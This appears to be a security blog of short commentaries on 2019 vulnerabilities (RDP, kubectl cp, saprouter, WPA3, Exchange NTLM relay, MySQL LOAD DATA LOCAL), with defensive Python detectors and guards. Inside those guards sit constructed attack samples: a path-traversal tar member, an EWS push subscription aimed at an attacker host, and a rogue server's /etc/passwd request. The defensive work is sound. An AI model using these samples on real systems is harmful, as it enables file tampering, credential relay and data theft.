Vulnerability Note VU#576688
Original Release Date: 2019-06-04 | Last Revised: 2019-06-04
Preface: The more power you have, the greater the risk of being infected.
Synopsis: Microsoft Windows RDP Network Level Authentication can allow an attacker to bypass the lock screen on remote sessions.
My observation: Microsoft's RDP implementation creates an internal virtual channel named MS_T120, bound by default to channel index 31. The vulnerability is triggered when a client binds MS_T120 to a different channel index and sends data to it, after which the server references the channel again once it has been closed (a use-after-free). Note that this MS_T120 issue is a separate RDP bug from the lock-screen bypass described in the synopsis above.
Interim remediation step:
Disable RDP if it is not needed.
SIEM firing rule: alert on any client request for the "MS_T120" channel at a channel index other than 31 (a legitimate client never requests this channel by name).
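To make the SIEM rule concrete, here is an added example (my code, not from the vulnerability note or from Microsoft) that parses the TS_UD_CS_NET block of an RDP client's Connect Initial PDU, where the client lists the static virtual channels it wants, and flags any request for MS_T120. The layout (type 0xC003, length, channelCount, then 12-byte CHANNEL_DEF entries of an 8-byte name plus 4-byte options) follows MS-RDPBCGR; the sample blocks are constructed in the code, not captured traffic. Because the server binds MS_T120 internally at index 31, any client that asks for it by name is asking for a non-31 binding, which is exactly what the rule above wants to catch.

```python
import struct

CS_NET = 0xC003        # TS_UD_CS_NET header type (MS-RDPBCGR 2.2.1.3.4)
CHANNEL_DEF_LEN = 12   # CHANNEL_DEF: 8-byte ANSI name + 4-byte options


def parse_cs_net(block: bytes) -> list:
    """Return the static virtual channel names a client requests in a TS_UD_CS_NET block."""
    if len(block) < 8:
        raise ValueError("block too short for a TS_UD_CS_NET header")
    hdr_type, hdr_len, count = struct.unpack_from("<HHI", block, 0)
    if hdr_type != CS_NET or hdr_len > len(block):
        raise ValueError("not a well-formed TS_UD_CS_NET block")
    if 8 + count * CHANNEL_DEF_LEN > hdr_len:
        raise ValueError("channelCount exceeds the block length")
    names = []
    for i in range(count):
        off = 8 + i * CHANNEL_DEF_LEN
        raw_name = block[off:off + 8].split(b"\x00", 1)[0]
        names.append(raw_name.decode("ascii", errors="replace"))
    return names


def suspicious_channels(block: bytes) -> list:
    """Channel names a legitimate client never requests: the server binds MS_T120 itself."""
    return [name for name in parse_cs_net(block) if name.upper() == "MS_T120"]


def build_cs_net(names) -> bytes:
    """Construct a TS_UD_CS_NET block for testing (constructed data, not a real capture)."""
    defs = b"".join(struct.pack("<8sI", n.encode("ascii"), 0) for n in names)
    return struct.pack("<HHI", CS_NET, 8 + len(defs), len(names)) + defs


if __name__ == "__main__":
    # A normal mstsc-style channel list versus one that asks for the internal channel.
    print(suspicious_channels(build_cs_net(["rdpdr", "rdpsnd", "cliprdr", "drdynvc"])))  # []
    print(suspicious_channels(build_cs_net(["rdpdr", "MS_T120"])))                        # ['MS_T120']
```

The same logic ports directly to an IDS content match on the 8-byte channel name inside the client's MCS Connect Initial; the parser here is only there to show where in the PDU that name lives.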
Preface: Patch management is the practice of keeping existing software up to date so that known security weaknesses cannot be exploited by attackers.
Background: PrinterLogic’s printer and driver management platform reduces infrastructure costs by eliminating print servers and providing centralized management of every printer on the network. Sold in both on-premise and cloud configurations, PrinterLogic also offers secure pull printing, mobile printing, and improved performance in virtual desktop (VDI) environments.
Preface: Some of the world's supercomputers also run Kubernetes.
Technical background: kubectl controls the Kubernetes cluster manager. The "kubectl cp" command copies files and directories to and from containers; under the hood it runs tar inside the container and unpacks the resulting stream on the user's machine.
Vulnerability details: An attacker who controls a container, or who can fool a user into running kubectl cp against one, can return a malicious tar archive whose member paths escape the destination directory. Successful exploitation allows the attacker to overwrite or delete any file that the user's security context can write to.
Comment: This vulnerability looks hard to exploit. However, the level of risk depends on how the container workloads are used, so do not dismiss the issue; the actual level of risk is hard to predict.
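As an added example (my code, not from the Kubernetes project), the following shows the path-traversal trick behind this bug and the check that defeats it: a constructed tar archive with a member named ../../.bashrc, and an extractor that resolves every member path against the destination and refuses the whole archive if any member (or symlink target) would land outside it. The archive contents and the temporary destination directory are assumptions made for the demonstration.

```python
import io
import os
import tarfile
import tempfile


def build_tar(members: dict) -> bytes:
    """Build an in-memory tar from {member_name: content}; constructed test data only."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def escaping_members(tar_bytes: bytes, dest: str) -> list:
    """Names of members that would land outside `dest` once extracted."""
    dest_real = os.path.realpath(dest)
    bad = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for m in tar.getmembers():
            target = os.path.realpath(os.path.join(dest_real, m.name))
            if os.path.commonpath([dest_real, target]) != dest_real:
                bad.append(m.name)
            elif m.issym():
                # A symlink pointing outside dest lets a later member write through it.
                link = os.path.realpath(os.path.join(os.path.dirname(target), m.linkname))
                if os.path.commonpath([dest_real, link]) != dest_real:
                    bad.append(m.name)
    return bad


def safe_extract(tar_bytes: bytes, dest: str) -> list:
    """Extract only when no member escapes dest; return the extracted member names."""
    bad = escaping_members(tar_bytes, dest)
    if bad:
        raise ValueError(f"refusing to extract: members escape {dest}: {bad}")
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        # Newer Pythons also ship a 'data' extraction filter; use it when present.
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(dest, **kwargs)
        return [m.name for m in tar.getmembers()]


def demo() -> dict:
    """Run a benign archive and a path-traversal archive through the guard."""
    dest = tempfile.mkdtemp(prefix="kubectl-cp-")  # stands in for the user's local destination
    benign = build_tar({"app/config.yaml": b"debug: false\n"})
    # What a compromised container could hand back to kubectl cp (constructed content).
    evil = build_tar({"app/config.yaml": b"debug: false\n",
                      "../../.bashrc": b"# attacker-controlled content\n"})
    result = {"benign_extracted": safe_extract(benign, dest),
              "evil_escaping": escaping_members(evil, dest),
              "evil_rejected": False}
    try:
        safe_extract(evil, dest)
    except ValueError:
        result["evil_rejected"] = True
    return result


if __name__ == "__main__":
    print(demo())
```

The key design point is that the check runs before anything touches the filesystem, and it is made on resolved paths rather than on the raw member name, so "a/../../x" and absolute names are treated the same as a plain "../x".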
Preface: It is reported that an estimated total of 1,000,000 SAP production systems could currently be at risk of being hacked.
Technical details: When you configure SAP Router (saprouter) to allow remote connections (from the Internet) via SAP GUI, the usual setup adds route-table entries for the gateway ports of the external applications in use, for example TCP 3300, 3301 and 3303 (the gateway listens on 33NN, where NN is the instance number).
Default TCP gateway port exploited by attackers: because a default path to the gateway is opened, an attacker has a channel to the system, for example by sending crafted requests that attempt remote code execution. A proof of concept has shown the SAP backend responding to such malicious input.
Remedy: If you outsource your security monitoring to a managed security services provider, they will write detection rules to block such activity; otherwise you need to write them yourself (IDS signatures such as Snort/Suricata rules, or YARA rules for payload scanning; YARA by itself is not an IDS rule language). Also restrict the saprouter route table so that gateway ports are reachable only from the hosts that need them. For more details, please refer to the diagram.
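As an added example (my code, not SAP's), here is a check over a saprouter route table that flags permit entries allowing any source ("*") to reach a gateway port, which is the exposure described above. It assumes the saprouttab line layout action / source-host / destination-host / destination-service, with "*" as the wildcard and 33NN or sapgwNN as the gateway services; the sample table is constructed for the demonstration rather than taken from a real installation.

```python
import re

# 33NN is the SAP gateway port of instance NN; "sapgwNN" is its /etc/services alias.
GATEWAY_SERVICE = re.compile(r"^(?:33\d\d|sapgw\d\d)$")
# P = permit, D = deny, S = permit SAP protocol only; K* variants require SNC.
ACTIONS = {"P", "D", "S", "KP", "KD", "KS"}

# Constructed route table, not taken from any real deployment.
SAMPLE_SAPROUTTAB = """\
P 10.0.0.*      sapapp01  3200    # dispatcher for SAP GUI users on the LAN
P *             sapapp01  3300    # gateway of instance 00 reachable from anywhere
P *             sapapp01  sapgw01
S 203.0.113.10  sapapp01  3200
D *             *         *
"""


def parse_saprouttab(text: str) -> list:
    """Parse saprouttab lines into (action, source, target, service) tuples."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ACTIONS:
            raise ValueError(f"unrecognised saprouttab line: {raw!r}")
        entries.append(tuple(parts[:4]))
    return entries


def exposed_gateway_routes(text: str) -> list:
    """Permit entries that let any source reach a gateway port.

    saprouter uses the first matching line, so scanning stops at a catch-all deny;
    anything after it can never match.
    """
    findings = []
    for action, src, dst, svc in parse_saprouttab(text):
        if action in ("D", "KD") and (src, dst, svc) == ("*", "*", "*"):
            break
        if action in ("P", "KP") and src == "*" and (svc == "*" or GATEWAY_SERVICE.match(svc)):
            findings.append((src, dst, svc))
    return findings


if __name__ == "__main__":
    for finding in exposed_gateway_routes(SAMPLE_SAPROUTTAB):
        print("gateway exposed to any source:", finding)
```

The fix for each finding is to replace "*" with the address or range of the partner system that actually needs the gateway, and to leave the catch-all deny as the last line.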
Preface: The WPA3 protocol aims to enhance Wi-Fi security. It does, but something went wrong this time.
Technology synopsis: A very damaging DoS attack consists of clogging a peer with bogus requests carrying forged source IP addresses. Because modular exponentiation is computationally intensive, the Diffie-Hellman key exchange is highly vulnerable to this clogging (DoS) attack.
The SAE handshake of WPA3 also uses a cookie exchange procedure to mitigate clogging attacks.
But the cookie exchange mechanism has a technical limitation: everyone on the air receives the (supposedly secret) cookies.
An attacker running a rogue access point can force a client connecting to it to fall back to WPA2's 4-way handshake and thereby capture enough information to launch an offline dictionary attack.
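As an added example (my code, not from any Wi-Fi stack), here is the client-side policy that blocks the downgrade described above: parse the RSN information element an access point advertises, remember which SSIDs have been seen offering SAE (WPA3), and refuse a later PSK-only (WPA2) offer for the same SSID. The RSN IE layout (element ID 48, version, group cipher, pairwise suite list, AKM suite list, capabilities; suite selector OUI 00-0F-AC with type 2 = PSK and 8 = SAE) follows IEEE 802.11; the beacons are constructed by the code, not captured.

```python
import struct

RSN_ELEMENT_ID = 48
OUI = b"\x00\x0f\xac"          # IEEE 802.11 RSN suite selector OUI
CIPHER_CCMP = 4
AKM_PSK, AKM_SAE = 2, 8       # WPA2-Personal and WPA3-Personal AKM suite types


def build_rsn_ie(akms, pairwise=(CIPHER_CCMP,), group=CIPHER_CCMP, caps=0) -> bytes:
    """Construct an RSN IE advertising the given AKM suites (test data, not a capture)."""
    body = struct.pack("<H", 1) + OUI + bytes([group])
    body += struct.pack("<H", len(pairwise)) + b"".join(OUI + bytes([c]) for c in pairwise)
    body += struct.pack("<H", len(akms)) + b"".join(OUI + bytes([a]) for a in akms)
    body += struct.pack("<H", caps)
    return bytes([RSN_ELEMENT_ID, len(body)]) + body


def parse_rsn_akms(ie: bytes) -> set:
    """Return the set of AKM suite types advertised in an RSN information element."""
    if len(ie) < 2 or ie[0] != RSN_ELEMENT_ID or ie[1] != len(ie) - 2:
        raise ValueError("not an RSN information element")
    body = ie[2:]
    if len(body) < 8 or struct.unpack_from("<H", body, 0)[0] != 1:
        raise ValueError("unsupported RSN version or truncated element")
    off = 2 + 4                                   # version + group cipher suite
    n_pair = struct.unpack_from("<H", body, off)[0]
    off += 2 + 4 * n_pair
    if off + 2 > len(body):
        raise ValueError("truncated pairwise suite list")
    n_akm = struct.unpack_from("<H", body, off)[0]
    off += 2
    if off + 4 * n_akm > len(body):
        raise ValueError("truncated AKM suite list")
    akms = set()
    for i in range(n_akm):
        suite = body[off + 4 * i: off + 4 * i + 4]
        if suite[:3] == OUI:
            akms.add(suite[3])
    return akms


class DowngradeGuard:
    """Client policy: once an SSID has been seen offering SAE, refuse a PSK-only offer for it."""

    def __init__(self):
        self.seen_sae = set()

    def evaluate(self, ssid: str, rsn_ie: bytes) -> str:
        akms = parse_rsn_akms(rsn_ie)
        if AKM_SAE in akms:
            self.seen_sae.add(ssid)
            return "connect-sae"
        if ssid in self.seen_sae:
            return "reject-downgrade"   # rogue AP replaying the SSID with WPA2 only
        return "connect-psk" if AKM_PSK in akms else "reject"


if __name__ == "__main__":
    guard = DowngradeGuard()
    print(guard.evaluate("corp-wifi", build_rsn_ie([AKM_PSK, AKM_SAE])))  # connect-sae
    print(guard.evaluate("corp-wifi", build_rsn_ie([AKM_PSK])))           # reject-downgrade
```

The policy only helps a client that has connected to the genuine WPA3 network at least once; a client that first meets the rogue AP has nothing to compare against, which is why the transition mode itself is the weak point.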
Preface: The so-called Spoiler vulnerability stems from an Intel CPU design limitation. An attacker who successfully exploits it can mount a "Rowhammer" attack for privilege escalation.
Vulnerability detail: Speculative execution in Intel processors is meant to increase CPU performance, but it has also been the cause of Intel CPU vulnerabilities in the past. A newly found technique can determine how virtual and physical memory are related to each other: by measuring timing differences, an attacker can learn the physical memory layout and therefore which area to attack. For more details, please refer to the attached diagram.
Remedy: There is no mitigation that completely erases this problem.
Conclusion: Rowhammer is hard to detect. Bear in mind that a predictive, layered defence will reduce the risk: for example, 360-degree protection including spam and DNS filtering, SIEM, malware protection and managed security services keeps the impact of this vulnerability under control.
Preface: This vulnerability is included in this week's MS Patch Tuesday. However, it is more critical than the others, since a threat actor on the network can achieve remote code execution simply by sending crafted packets, with no user interaction required.
Technical highlight: The official announcement states that an attacker could exploit the vulnerability by sending a DHCP packet carrying malicious input to the affected software, because the DHCP server improperly handles objects in memory. A successful exploit could allow the attacker to execute arbitrary code and completely compromise the system.
My observation: We did not find additional details of this vulnerability. My speculation is that the Windows 2008 DHCP server has a non-paged memory leak flaw that causes this problem. What do you think?
Official remediation: CVE-2019-0626 | Windows DHCP Server Remote Code Execution Vulnerability
Preface: The Marvell 88W8897A SoC (System on a Chip) is the industry’s first 802.11ac chip to combine Bluetooth 4.2, mobile MIMO (Multi-input Multi-output), transmit beamforming, and with built-in support for all screen projection technologies.
Technology background: Computer design focuses primarily on memory usage, and SoC (System on a Chip) design is no exception.
Vulnerability found: During Wi-Fi network scans, an overflow condition can be triggered that overwrites certain ThreadX block pool data structures.
Exploitation of vulnerability: An attacker within Wi-Fi range can exploit the ThreadX block pool overflow to intercept network traffic or achieve code execution on the host system.
Remedy: Marvell encourages customers to contact their Marvell representative for additional support.
Remark: This vulnerability made headline news in mid-January 2019. However, we could not find any positive response announced by the vendor.
Preface: With an EWS push subscription, you keep receiving notifications as long as you respond to the server and acknowledge that you received each notification.
The CERT Coordination Center (CERT/CC) announcement – 29th Jan 2019: Microsoft Exchange 2013 and newer are vulnerable to NTLM relay attacks
Vulnerability detail: Exchange allows any user to specify a desired URL for a push subscription, and the server will attempt to send notifications to that URL, authenticating to it with NTLM as the Exchange server's machine account, which holds high privileges in the domain… For more detail, please refer to the attached diagram.
Disable EWS push/pull subscriptions.
Remove the privileges that Exchange has on the domain object.
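As an added example (my code, not Microsoft's), here is what the abused request looks like and a check that could be applied in front of EWS: a constructed SOAP Subscribe message with a PushSubscriptionRequest whose callback URL points at an attacker host, and a function that extracts every callback URL and reports those not on an allow-list of internal notification endpoints. The namespaces are the standard EWS ones; the callback address 203.0.113.7 and the allowed host names are assumptions for the demonstration.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

NS = {
    "s": "http://schemas.xmlsoap.org/soap/envelope/",
    "m": "http://schemas.microsoft.com/exchange/services/2006/messages",
    "t": "http://schemas.microsoft.com/exchange/services/2006/types",
}

# Constructed EWS Subscribe request. 203.0.113.7 is a documentation address standing in
# for the attacker's listener; Exchange would connect to it and authenticate with NTLM.
SAMPLE_SUBSCRIBE = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
               xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
  <soap:Body>
    <m:Subscribe>
      <m:PushSubscriptionRequest>
        <t:FolderIds><t:DistinguishedFolderId Id="inbox"/></t:FolderIds>
        <t:EventTypes><t:EventType>NewMailEvent</t:EventType></t:EventTypes>
        <t:StatusFrequency>1</t:StatusFrequency>
        <t:URL>http://203.0.113.7/relay/EWS/Exchange.asmx</t:URL>
      </m:PushSubscriptionRequest>
    </m:Subscribe>
  </soap:Body>
</soap:Envelope>
"""


def push_callback_urls(soap_xml: str) -> list:
    """Extract every push-subscription callback URL from an EWS Subscribe request."""
    root = ET.fromstring(soap_xml)
    return [el.text.strip()
            for el in root.iterfind(".//m:PushSubscriptionRequest/t:URL", NS)
            if el.text]


def offending_callbacks(soap_xml: str, allowed_hosts) -> list:
    """Callback URLs whose host is not an approved internal notification listener."""
    allowed = {h.lower() for h in allowed_hosts}
    bad = []
    for url in push_callback_urls(soap_xml):
        host = (urlparse(url).hostname or "").lower()
        if host not in allowed:
            bad.append(url)
    return bad


if __name__ == "__main__":
    # Hypothetical allow-list of the only hosts that legitimately receive push notifications.
    print(offending_callbacks(SAMPLE_SUBSCRIBE, ["notify.corp.example"]))
```

Blocking the request at a reverse proxy is a stop-gap that covers the common case; the remediation steps above (disabling the subscriptions and stripping Exchange's domain privileges) remove the relay target itself.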
Preface: Some organizations that use MySQL include GitHub, US Navy, NASA, Tesla, Netflix, WeChat, Facebook, Zendesk, Twitter, Zappos, YouTube,…etc
Background: Technology writer Ionut Ilascu warned that a MySQL feature can be abused by a malicious server to steal personal and web-server data from connecting clients, without any advanced evasion technique.
Technical overview: Security issues with LOAD DATA LOCAL on the MySQL server side: a rogue or compromised server can request any file on the client host to which the client user has read access, because it is the server, not the client, that names the file to be sent.
Security issues with LOAD DATA LOCAL on the web server side:
In a web environment where clients connect from a web server, a user could use LOAD DATA LOCAL to read any file that the web server process has read access to.
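As an added example (my code, not the MySQL client library's), the following simulates the client side of the exchange: after any query a rogue server can answer with a LOCAL INFILE request packet (payload beginning with 0xFB followed by the filename), and a naive client simply sends that file. The hardened client below refuses the packet unless LOCAL INFILE is enabled, the last statement it sent really was LOAD DATA LOCAL INFILE, and the filename the server asks for matches the one in the statement. Packet payloads are constructed inline with the 4-byte MySQL packet header already stripped.

```python
import re

LOCAL_INFILE_REQUEST = 0xFB   # first payload byte of a server "LOCAL INFILE Request" packet
OK_PACKET, ERR_PACKET = 0x00, 0xFF
LOAD_LOCAL_RE = re.compile(
    r"^\s*LOAD\s+DATA\s+(?:LOW_PRIORITY\s+|CONCURRENT\s+)?LOCAL\s+INFILE\s+'([^']*)'", re.I)


def classify_response(payload: bytes) -> dict:
    """Classify a server response payload (4-byte packet header already stripped)."""
    if not payload:
        raise ValueError("empty packet payload")
    tag = payload[0]
    if tag == LOCAL_INFILE_REQUEST:
        return {"type": "local_infile", "filename": payload[1:].decode("utf-8", "replace")}
    if tag == OK_PACKET:
        return {"type": "ok"}
    if tag == ERR_PACKET:
        return {"type": "error"}
    return {"type": "result_set"}


class HardenedClient:
    """Client-side state that refuses file uploads the client did not ask for."""

    def __init__(self, allow_local_infile: bool = False):
        self.allow_local_infile = allow_local_infile
        self.last_query = ""

    def send_query(self, sql: str) -> None:
        self.last_query = sql  # a real client would write a COM_QUERY packet here

    def handle_response(self, payload: bytes):
        resp = classify_response(payload)
        if resp["type"] != "local_infile":
            return resp["type"], None
        # The naive client would open resp["filename"] here and stream it to the server.
        if not self.allow_local_infile:
            raise PermissionError("server asked for a local file but LOCAL INFILE is disabled")
        match = LOAD_LOCAL_RE.match(self.last_query)
        if not match:
            raise PermissionError(f"unsolicited LOCAL INFILE request for {resp['filename']!r}")
        if match.group(1) != resp["filename"]:
            raise PermissionError(
                f"server asked for {resp['filename']!r} but the query named {match.group(1)!r}")
        return "upload", resp["filename"]


def is_rejected(client: HardenedClient, payload: bytes) -> bool:
    """True if the client refuses the server's response."""
    try:
        client.handle_response(payload)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    c = HardenedClient(allow_local_infile=False)
    c.send_query("SELECT 1")
    print(is_rejected(c, b"\xfb/etc/passwd"))  # True: a rogue server answering SELECT with a file request
```

Disabling LOCAL INFILE at the client (the equivalent of the mysql client's --local-infile=0) is the simplest defence; the query-and-filename check shows what a client that genuinely needs the feature has to do to stay safe against a server it does not trust.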